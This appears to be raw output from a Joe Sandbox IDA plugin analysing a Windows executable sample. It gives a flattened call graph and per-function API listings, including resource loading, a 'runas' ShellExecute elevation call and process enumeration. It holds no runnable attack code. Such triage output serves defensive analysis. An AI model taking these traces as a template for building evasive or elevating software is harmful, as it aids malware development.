96717->96697 96718->96706 96719->96706 96720->96706 96721->96697 96722->96689 96723 bb2a55 96731 b91ebc 96723->96731 96726 bb2a87 96727 bb2a70 96733 b839c0 22 API calls 96727->96733 96729 bb2a7c 96734 b8417d 22 API calls __fread_nolock 96729->96734 96732 b91ec3 IsWindow 96731->96732 96732->96726 96732->96727 96733->96729 96734->96726 96735 b403fb 96736 b40407 ___DestructExceptionObject 96735->96736 96764 b3feb1 96736->96764 96738 b40561 96791 b4083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96738->96791 96740 b4040e 96740->96738 96742 b40438 96740->96742 96741 b40568 96792 b44e52 28 API calls _abort 96741->96792 96753 b40477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96742->96753 96775 b5247d 96742->96775 96744 b4056e 96793 b44e04 28 API calls _abort 96744->96793 96748 b40576 96749 b40457 96751 b404d8 96783 b40959 96751->96783 96753->96751 96787 b44e1a 38 API calls 2 library calls 96753->96787 96755 b404de 96756 b404f3 96755->96756 96788 b40992 GetModuleHandleW 96756->96788 96758 b404fa 96758->96741 96759 b404fe 96758->96759 96760 b40507 96759->96760 96789 b44df5 28 API calls _abort 96759->96789 96790 b40040 13 API calls 2 library calls 96760->96790 96763 b4050f 96763->96749 96765 b3feba 96764->96765 96794 b40698 IsProcessorFeaturePresent 96765->96794 96767 b3fec6 96795 b42c94 10 API calls 3 library calls 96767->96795 96769 b3fecb 96770 b3fecf 96769->96770 96796 b52317 96769->96796 96770->96740 96773 b3fee6 96773->96740 96776 b52494 96775->96776 96777 b40a8c CatchGuardHandler 5 API calls 96776->96777 96778 b40451 96777->96778 96778->96749 96779 b52421 96778->96779 96780 b52450 96779->96780 96781 b40a8c CatchGuardHandler 5 API calls 96780->96781 96782 b52479 96781->96782 96782->96753 96856 b42340 96783->96856 96785 b4096c GetStartupInfoW 96786 b4097f 96785->96786 96786->96755 96787->96751 96788->96758 96789->96760 96790->96763 96791->96741 96792->96744 96793->96748 96794->96767 96795->96769 96800 b5d1f6 96796->96800 96799 b42cbd 8 API calls 3 library calls 96799->96770 96803 b5d213 96800->96803 96804 b5d20f 96800->96804 96802 b3fed8 96802->96773 96802->96799 96803->96804 96806 b54bfb 96803->96806 96818 b40a8c 96804->96818 96807 b54c07 ___DestructExceptionObject 96806->96807 96825 b52f5e EnterCriticalSection 96807->96825 96809 b54c0e 96826 b550af 96809->96826 96811 b54c1d 96812 b54c2c 96811->96812 96839 b54a8f 29 API calls 96811->96839 96841 b54c48 LeaveCriticalSection _abort 96812->96841 96815 b54c27 96840 b54b45 GetStdHandle GetFileType 96815->96840 96816 b54c3d __fread_nolock 96816->96803 96819 b40a95 96818->96819 96820 b40a97 IsProcessorFeaturePresent 96818->96820 96819->96802 96822 b40c5d 96820->96822 96855 b40c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96822->96855 96824 b40d40 96824->96802 96825->96809 96827 b550bb ___DestructExceptionObject 96826->96827 96828 b550df 96827->96828 96829 b550c8 96827->96829 96842 b52f5e EnterCriticalSection 96828->96842 96850 b4f2d9 20 API calls __dosmaperr 96829->96850 96832 b550cd 96851 b527ec 26 API calls __fread_nolock 96832->96851 96834 b55117 96852 b5513e LeaveCriticalSection _abort 96834->96852 96835 b550d7 __fread_nolock 96835->96811 96838 b550eb 96838->96834 96843 b55000 96838->96843 96839->96815 96840->96812 96841->96816 96842->96838 96844 b54c7d pre_c_initialization 20 API calls 96843->96844 96845 b55012 96844->96845 96849 b5501f 96845->96849 96853 b53405 11 API calls 2 library calls 96845->96853 96848 b55071 96848->96838 96854 b529c8 20 API calls __dosmaperr 96849->96854 96850->96832 96851->96835 96852->96835 96853->96845 96854->96848 96855->96824 96857 b42357 96856->96857 96857->96785 96857->96857 96858 b22de3 96859 b22df0 __wsopen_s 96858->96859 96860 b22e09 96859->96860 96861 b62c2b ___scrt_fastfail 96859->96861 96862 b23aa2 23 API calls 96860->96862 96863 b62c47 GetOpenFileNameW 96861->96863 96864 b22e12 96862->96864 96865 b62c96 96863->96865 96874 b22da5 96864->96874 96867 b26b57 22 API calls 96865->96867 96869 b62cab 96867->96869 96869->96869 96871 b22e27 96892 b244a8 96871->96892 96875 b61f50 __wsopen_s 96874->96875 96876 b22db2 GetLongPathNameW 96875->96876 96877 b26b57 22 API calls 96876->96877 96878 b22dda 96877->96878 96879 b23598 96878->96879 96880 b2a961 22 API calls 96879->96880 96881 b235aa 96880->96881 96882 b23aa2 23 API calls 96881->96882 96883 b235b5 96882->96883 96884 b235c0 96883->96884 96885 b632eb 96883->96885 96887 b2515f 22 API calls 96884->96887 96890 b6330d 96885->96890 96927 b3ce60 41 API calls 96885->96927 96888 b235cc 96887->96888 96921 b235f3 96888->96921 96891 b235df 96891->96871 96893 b24ecb 94 API calls 96892->96893 96894 b244cd 96893->96894 96895 b63833 96894->96895 96896 b24ecb 94 API calls 96894->96896 96897 b92cf9 80 API calls 96895->96897 96898 b244e1 96896->96898 96899 b63848 96897->96899 96898->96895 96900 b244e9 96898->96900 96901 b6384c 96899->96901 96902 b63869 96899->96902 96904 b63854 96900->96904 96905 b244f5 96900->96905 96906 b24f39 68 API calls 96901->96906 96903 b3fe0b 22 API calls 96902->96903 96908 b638ae 96903->96908 96929 b8da5a 82 API calls 96904->96929 96928 b2940c 136 API calls 2 library calls 96905->96928 96906->96904 96912 b63a5f 96908->96912 96918 b29cb3 22 API calls 96908->96918 96930 b8967e 22 API calls __fread_nolock 96908->96930 96931 b895ad 42 API calls _wcslen 96908->96931 96932 b90b5a 22 API calls 96908->96932 96933 b2a4a1 22 API calls __fread_nolock 96908->96933 96934 b23ff7 22 API calls 96908->96934 96910 b63862 96910->96902 96911 b22e31 96913 b24f39 68 API calls 96912->96913 96935 b8989b 82 API calls __wsopen_s 96912->96935 96913->96912 96918->96908 96922 b23605 96921->96922 96926 b23624 __fread_nolock 96921->96926 96925 b3fe0b 22 API calls 96922->96925 96923 b3fddb 22 API calls 96924 b2363b 96923->96924 96924->96891 96925->96926 96926->96923 96927->96885 96928->96911 96929->96910 96930->96908 96931->96908 96932->96908 96933->96908 96934->96908 96935->96912 96936 b62ba5 96937 b22b25 96936->96937 96938 b62baf 96936->96938 96964 b22b83 7 API calls 96937->96964 96940 b23a5a 24 API calls 96938->96940 96942 b62bb8 96940->96942 96943 b29cb3 22 API calls 96942->96943 96945 b62bc6 96943->96945 96947 b62bf5 96945->96947 96948 b62bce 96945->96948 96946 b22b2f 96949 b23837 49 API calls 96946->96949 96950 b22b44 96946->96950 96952 b233c6 22 API calls 96947->96952 96951 b233c6 22 API calls 96948->96951 96949->96950 96955 b22b5f 96950->96955 96968 b230f2 Shell_NotifyIconW ___scrt_fastfail 96950->96968 96953 b62bd9 96951->96953 96954 b62bf1 GetForegroundWindow ShellExecuteW 96952->96954 96956 b26350 22 API calls 96953->96956 96960 b62c26 96954->96960 96962 b22b66 SetCurrentDirectoryW 96955->96962 96959 b62be7 96956->96959 96961 b233c6 22 API calls 96959->96961 96960->96955 96961->96954 96963 b22b7a 96962->96963 96969 b22cd4 7 API calls 96964->96969 96966 b22b2a 96967 b22c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96966->96967 96967->96946 96968->96955 96969->96966 96970 b21044 96975 b210f3 96970->96975 96972 b2104a 97011 b400a3 29 API calls __onexit 96972->97011 96974 b21054 97012 b21398 96975->97012 96979 b2116a 96980 b2a961 22 API calls 96979->96980 96981 b21174 96980->96981 96982 b2a961 22 API calls 96981->96982 96983 b2117e 96982->96983 96984 b2a961 22 API calls 96983->96984 96985 b21188 96984->96985 96986 b2a961 22 API calls 96985->96986 96987 b211c6 96986->96987 96988 b2a961 22 API calls 96987->96988 96989 b21292 96988->96989 97022 b2171c 96989->97022 96993 b212c4 96994 b2a961 22 API calls 96993->96994 96995 b212ce 96994->96995 96996 b31940 9 API calls 96995->96996 96997 b212f9 96996->96997 97043 b21aab 96997->97043 96999 b21315 97000 b21325 GetStdHandle 96999->97000 97001 b62485 97000->97001 97002 b2137a 97000->97002 97001->97002 97003 b6248e 97001->97003 97005 b21387 OleInitialize 97002->97005 97004 b3fddb 22 API calls 97003->97004 97006 b62495 97004->97006 97005->96972 97050 b9011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97006->97050 97008 b6249e 97051 b90944 CreateThread 97008->97051 97010 b624aa CloseHandle 97010->97002 97011->96974 97052 b213f1 97012->97052 97015 b213f1 22 API calls 97016 b213d0 97015->97016 97017 b2a961 22 API calls 97016->97017 97018 b213dc 97017->97018 97019 b26b57 22 API calls 97018->97019 97020 b21129 97019->97020 97021 b21bc3 6 API calls 97020->97021 97021->96979 97023 b2a961 22 API calls 97022->97023 97024 b2172c 97023->97024 97025 b2a961 22 API calls 97024->97025 97026 b21734 97025->97026 97027 b2a961 22 API calls 97026->97027 97028 b2174f 97027->97028 97029 b3fddb 22 API calls 97028->97029 97030 b2129c 97029->97030 97031 b21b4a 97030->97031 97032 b21b58 97031->97032 97033 b2a961 22 API calls 97032->97033 97034 b21b63 97033->97034 97035 b2a961 22 API calls 97034->97035 97036 b21b6e 97035->97036 97037 b2a961 22 API calls 97036->97037 97038 b21b79 97037->97038 97039 b2a961 22 API calls 97038->97039 97040 b21b84 97039->97040 97041 b3fddb 22 API calls 97040->97041 97042 b21b96 RegisterWindowMessageW 97041->97042 97042->96993 97044 b21abb 97043->97044 97045 b6272d 97043->97045 97046 b3fddb 22 API calls 97044->97046 97059 b93209 23 API calls 97045->97059 97048 b21ac3 97046->97048 97048->96999 97049 b62738 97050->97008 97051->97010 97060 b9092a 28 API calls 97051->97060 97053 b2a961 22 API calls 97052->97053 97054 b213fc 97053->97054 97055 b2a961 22 API calls 97054->97055 97056 b21404 97055->97056 97057 b2a961 22 API calls 97056->97057 97058 b213c6 97057->97058 97058->97015 97059->97049 97061 b72a00 97077 b2d7b0 messages 97061->97077 97062 b2db11 PeekMessageW 97062->97077 97063 b2d807 GetInputState 97063->97062 97063->97077 97064 b71cbe TranslateAcceleratorW 97064->97077 97066 b2db8f PeekMessageW 97066->97077 97067 b2da04 timeGetTime 97067->97077 97068 b2db73 TranslateMessage DispatchMessageW 97068->97066 97069 b2dbaf Sleep 97069->97077 97070 b72b74 Sleep 97084 b72aea 97070->97084 97073 b71dda timeGetTime 97107 b3e300 23 API calls 97073->97107 97076 b72c0b GetExitCodeProcess 97079 b72c37 CloseHandle 97076->97079 97080 b72c21 WaitForSingleObject 97076->97080 97077->97062 97077->97063 97077->97064 97077->97066 97077->97067 97077->97068 97077->97069 97077->97070 97077->97073 97078 b2d9d5 97077->97078 97081 bb29bf GetForegroundWindow 97077->97081 97077->97084 97089 b2ec40 349 API calls 97077->97089 97090 b31310 349 API calls 97077->97090 97091 b2bf40 349 API calls 97077->97091 97093 b2dd50 97077->97093 97100 b3edf6 97077->97100 97105 b2dfd0 349 API calls 3 library calls 97077->97105 97106 b3e551 timeGetTime 97077->97106 97108 b93a2a 23 API calls 97077->97108 97109 b9359c 82 API calls __wsopen_s 97077->97109 97079->97084 97080->97077 97080->97079 97081->97077 97083 b72ca9 Sleep 97083->97077 97084->97076 97084->97077 97084->97078 97084->97083 97110 ba5658 23 API calls 97084->97110 97111 b8e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97084->97111 97112 b3e551 timeGetTime 97084->97112 97113 b8d4dc 47 API calls 97084->97113 97089->97077 97090->97077 97091->97077 97094 b2dd6f 97093->97094 97096 b2dd83 97093->97096 97114 b2d260 97094->97114 97146 b9359c 82 API calls __wsopen_s 97096->97146 97097 b2dd7a 97097->97077 97099 b72f75 97099->97099 97101 b3ee12 97100->97101 97103 b3ee09 97100->97103 97102 b3ee36 IsDialogMessageW 97101->97102 97101->97103 97104 b7efaf GetClassLongW 97101->97104 97102->97101 97102->97103 97103->97077 97104->97101 97104->97102 97105->97077 97106->97077 97107->97077 97108->97077 97109->97077 97110->97084 97111->97084 97112->97084 97113->97084 97115 b2ec40 349 API calls 97114->97115 97132 b2d29d 97115->97132 97116 b71bc4 97153 b9359c 82 API calls __wsopen_s 97116->97153 97118 b2d30b messages 97118->97097 97119 b2d6d5 97119->97118 97130 b3fe0b 22 API calls 97119->97130 97120 b2d3c3 97120->97119 97122 b2d3ce 97120->97122 97121 b2d5ff 97124 b71bb5 97121->97124 97125 b2d614 97121->97125 97123 b3fddb 22 API calls 97122->97123 97134 b2d3d5 __fread_nolock 97123->97134 97152 ba5705 23 API calls 97124->97152 97128 b3fddb 22 API calls 97125->97128 97126 b2d4b8 97131 b3fe0b 22 API calls 97126->97131 97139 b2d46a 97128->97139 97129 b3fddb 22 API calls 97129->97132 97130->97134 97141 b2d429 __fread_nolock messages 97131->97141 97132->97116 97132->97118 97132->97119 97132->97120 97132->97126 97132->97129 97132->97141 97133 b3fddb 22 API calls 97135 b2d3f6 97133->97135 97134->97133 97134->97135 97135->97141 97147 b2bec0 349 API calls 97135->97147 97137 b71ba4 97151 b9359c 82 API calls __wsopen_s 97137->97151 97139->97097 97141->97121 97141->97137 97141->97139 97142 b71b7f 97141->97142 97144 b71b5d 97141->97144 97148 b21f6f 349 API calls 97141->97148 97150 b9359c 82 API calls __wsopen_s 97142->97150 97149 b9359c 82 API calls __wsopen_s 97144->97149 97146->97099 97147->97141 97148->97141 97149->97139 97150->97139 97151->97139 97152->97116 97153->97118 97154 b58402 97159 b581be 97154->97159 97158 b5842a 97160 b581ef try_get_first_available_module 97159->97160 97170 b58338 97160->97170 97174 b48e0b 40 API calls 2 library calls 97160->97174 97162 b583ee 97178 b527ec 26 API calls __fread_nolock 97162->97178 97164 b58343 97164->97158 97171 b60984 97164->97171 97166 b5838c 97166->97170 97175 b48e0b 40 API calls 2 library calls 97166->97175 97168 b583ab 97168->97170 97176 b48e0b 40 API calls 2 library calls 97168->97176 97170->97164 97177 b4f2d9 20 API calls __dosmaperr 97170->97177 97179 b60081 97171->97179 97173 b6099f 97173->97158 97174->97166 97175->97168 97176->97170 97177->97162 97178->97164 97180 b6008d ___DestructExceptionObject 97179->97180 97181 b6009b 97180->97181 97183 b600d4 97180->97183 97236 b4f2d9 20 API calls __dosmaperr 97181->97236 97190 b6065b 97183->97190 97184 b600a0 97237 b527ec 26 API calls __fread_nolock 97184->97237 97189 b600aa __fread_nolock 97189->97173 97191 b60678 97190->97191 97192 b606a6 97191->97192 97193 b6068d 97191->97193 97239 b55221 97192->97239 97253 b4f2c6 20 API calls __dosmaperr 97193->97253 97196 b606ab 97197 b606b4 97196->97197 97198 b606cb 97196->97198 97255 b4f2c6 20 API calls __dosmaperr 97197->97255 97252 b6039a CreateFileW 97198->97252 97202 b606b9 97256 b4f2d9 20 API calls __dosmaperr 97202->97256 97204 b60781 GetFileType 97205 b6078c GetLastError 97204->97205 97211 b607d3 97204->97211 97259 b4f2a3 20 API calls __dosmaperr 97205->97259 97206 b60692 97254 b4f2d9 20 API calls __dosmaperr 97206->97254 97207 b60756 GetLastError 97258 b4f2a3 20 API calls __dosmaperr 97207->97258 97208 b60704 97208->97204 97208->97207 97257 b6039a CreateFileW 97208->97257 97261 b5516a 21 API calls 2 library calls 97211->97261 97212 b6079a CloseHandle 97212->97206 97216 b607c3 97212->97216 97215 b60749 97215->97204 97215->97207 97260 b4f2d9 20 API calls __dosmaperr 97216->97260 97217 b607f4 97219 b60840 97217->97219 97262 b605ab 72 API calls 3 library calls 97217->97262 97224 b6086d 97219->97224 97263 b6014d 72 API calls 4 library calls 97219->97263 97220 b607c8 97220->97206 97223 b60866 97223->97224 97225 b6087e 97223->97225 97226 b586ae __wsopen_s 29 API calls 97224->97226 97227 b600f8 97225->97227 97228 b608fc CloseHandle 97225->97228 97226->97227 97238 b60121 LeaveCriticalSection __wsopen_s 97227->97238 97264 b6039a CreateFileW 97228->97264 97230 b60927 97231 b6095d 97230->97231 97232 b60931 GetLastError 97230->97232 97231->97227 97265 b4f2a3 20 API calls __dosmaperr 97232->97265 97234 b6093d 97266 b55333 21 API calls 2 library calls 97234->97266 97236->97184 97237->97189 97238->97189 97240 b5522d ___DestructExceptionObject 97239->97240 97267 b52f5e EnterCriticalSection 97240->97267 97242 b55234 97244 b55259 97242->97244 97248 b552c7 EnterCriticalSection 97242->97248 97250 b5527b 97242->97250 97245 b55000 __wsopen_s 21 API calls 97244->97245 97247 b5525e 97245->97247 97246 b552a4 __fread_nolock 97246->97196 97247->97250 97271 b55147 EnterCriticalSection 97247->97271 97248->97250 97251 b552d4 LeaveCriticalSection 97248->97251 97268 b5532a 97250->97268 97251->97242 97252->97208 97253->97206 97254->97227 97255->97202 97256->97206 97257->97215 97258->97206 97259->97212 97260->97220 97261->97217 97262->97219 97263->97223 97264->97230 97265->97234 97266->97231 97267->97242 97272 b52fa6 LeaveCriticalSection 97268->97272 97270 b55331 97270->97246 97271->97250 97272->97270 97273 b21cad SystemParametersInfoW

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 389 b242de-b2434d call b2a961 GetVersionExW call b26b57 394 b63617-b6362a 389->394 395 b24353 389->395 397 b6362b-b6362f 394->397 396 b24355-b24357 395->396 398 b63656 396->398 399 b2435d-b243bc call b293b2 call b237a0 396->399 400 b63632-b6363e 397->400 401 b63631 397->401 404 b6365d-b63660 398->404 418 b243c2-b243c4 399->418 419 b637df-b637e6 399->419 400->397 403 b63640-b63642 400->403 401->400 403->396 406 b63648-b6364f 403->406 408 b63666-b636a8 404->408 409 b2441b-b24435 GetCurrentProcess IsWow64Process 404->409 406->394 407 b63651 406->407 407->398 408->409 413 b636ae-b636b1 408->413 411 b24437 409->411 412 b24494-b2449a 409->412 415 b2443d-b24449 411->415 412->415 416 b636b3-b636bd 413->416 417 b636db-b636e5 413->417 420 b63824-b63828 GetSystemInfo 415->420 421 b2444f-b2445e LoadLibraryA 415->421 422 b636bf-b636c5 416->422 423 b636ca-b636d6 416->423 425 b636e7-b636f3 417->425 426 b636f8-b63702 417->426 418->404 424 b243ca-b243dd 418->424 427 b63806-b63809 419->427 428 b637e8 419->428 431 b24460-b2446e GetProcAddress 421->431 432 b2449c-b244a6 GetSystemInfo 421->432 422->409 423->409 433 b63726-b6372f 424->433 434 b243e3-b243e5 424->434 425->409 436 b63704-b63710 426->436 437 b63715-b63721 426->437 429 b637f4-b637fc 427->429 430 b6380b-b6381a 427->430 435 b637ee 428->435 429->427 430->435 440 b6381c-b63822 430->440 431->432 441 b24470-b24474 GetNativeSystemInfo 431->441 442 b24476-b24478 432->442 438 b63731-b63737 433->438 439 b6373c-b63748 433->439 443 b243eb-b243ee 434->443 444 b6374d-b63762 434->444 435->429 436->409 437->409 438->409 439->409 440->429 441->442 447 b24481-b24493 442->447 448 b2447a-b2447b FreeLibrary 442->448 449 b243f4-b2440f 443->449 450 b63791-b63794 443->450 445 b63764-b6376a 444->445 446 b6376f-b6377b 444->446 445->409 446->409 448->447 452 b63780-b6378c 449->452 453 b24415 449->453 450->409 451 b6379a-b637c1 450->451 454 b637c3-b637c9 451->454 455 b637ce-b637da 451->455 452->409 453->409 454->409 455->409
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00B2430D
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00BBCB64,00000000,?,?), ref: 00B24422
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00B24429
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B24454
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B24466
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B24474
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B2447B
                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00B244A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                                        • Opcode ID: ae52958c671be2109382cf211d5bc1fee65b3da6b5c2f1947c732ce151e4eed7
                                                                                                                                        • Instruction ID: f3abc73cb85f3fdd723b68413163bdaabff5f6dbcd1226e555aecb6c16096033
                                                                                                                                        • Opcode Fuzzy Hash: ae52958c671be2109382cf211d5bc1fee65b3da6b5c2f1947c732ce151e4eed7
                                                                                                                                        • Instruction Fuzzy Hash: C8A1837690A2D4FFC712DB6DBC815B57FE4AB26700B085CE9D09993B22DF744908CB29

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 654 b242a2-b242ba CreateStreamOnHGlobal 655 b242da-b242dd 654->655 656 b242bc-b242d3 FindResourceExW 654->656 657 b242d9 656->657 658 b635ba-b635c9 LoadResource 656->658 657->655 658->657 659 b635cf-b635dd SizeofResource 658->659 659->657 660 b635e3-b635ee LockResource 659->660 660->657 661 b635f4-b63612 660->661 661->657
                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B250AA,?,?,00000000,00000000), ref: 00B242B2
                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B250AA,?,?,00000000,00000000), ref: 00B242C9
                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00B250AA,?,?,00000000,00000000,?,?,?,?,?,?,00B24F20), ref: 00B635BE
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00B250AA,?,?,00000000,00000000,?,?,?,?,?,?,00B24F20), ref: 00B635D3
                                                                                                                                        • LockResource.KERNEL32(00B250AA,?,?,00B250AA,?,?,00000000,00000000,?,?,?,?,?,?,00B24F20,?), ref: 00B635E6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                        • String ID: SCRIPT
                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                        • Opcode ID: a1a2d723248be4bd64260c5a64f614b741ea408cf1664abd7a29fbe423b35643
                                                                                                                                        • Instruction ID: 34687a7b30f4031465270ec9f4a96353f9744162754f2522f5d51dfc827a8b77
                                                                                                                                        • Opcode Fuzzy Hash: a1a2d723248be4bd64260c5a64f614b741ea408cf1664abd7a29fbe423b35643
                                                                                                                                        • Instruction Fuzzy Hash: DA112A71200611EFDB218B66EC49F677BB9EBC5B51F2482A9B40696660DBB1D8048A60

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B22B6B
                                                                                                                                          • Part of subcall function 00B23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BF1418,?,00B22E7F,?,?,?,00000000), ref: 00B23A78
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00BE2224), ref: 00B62C10
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,00BE2224), ref: 00B62C17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                                        • String ID: runas
                                                                                                                                        • API String ID: 448630720-4000483414
                                                                                                                                        • Opcode ID: b4f8f37cbc9adaa863172d2863622ca99404d77578ef8ed87ec50e0a1566efbc
                                                                                                                                        • Instruction ID: ee48020fb9fb8798d77ba72d25e9d6f9415eb7038327e85b0974115e7f918a34
                                                                                                                                        • Opcode Fuzzy Hash: b4f8f37cbc9adaa863172d2863622ca99404d77578ef8ed87ec50e0a1566efbc
                                                                                                                                        • Instruction Fuzzy Hash: A711E131208355AAC714FF24F8569BE7BE8EB95740F480DECF18E570A2CF258A0AC712

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00BAA6AC
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00BAA6BA
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00BAA79C
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00BAA7AB
                                                                                                                                          • Part of subcall function 00B3CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B63303,?), ref: 00B3CE8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1991900642-0
                                                                                                                                        • Opcode ID: 079702c8ab33e192367eccc0d2dce821cd846fa1c87eff16fd23134a1e061da9
                                                                                                                                        • Instruction ID: c4a30767f5ab4bdc1cebdb6b815aa8a83d652234113aabfc602dbc1fc7eec7bb
                                                                                                                                        • Opcode Fuzzy Hash: 079702c8ab33e192367eccc0d2dce821cd846fa1c87eff16fd23134a1e061da9
                                                                                                                                        • Instruction Fuzzy Hash: 8B514D71508310AFD710EF24D886E6BBBE8FF89754F00496DF589A7251EB70D904CBA2

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
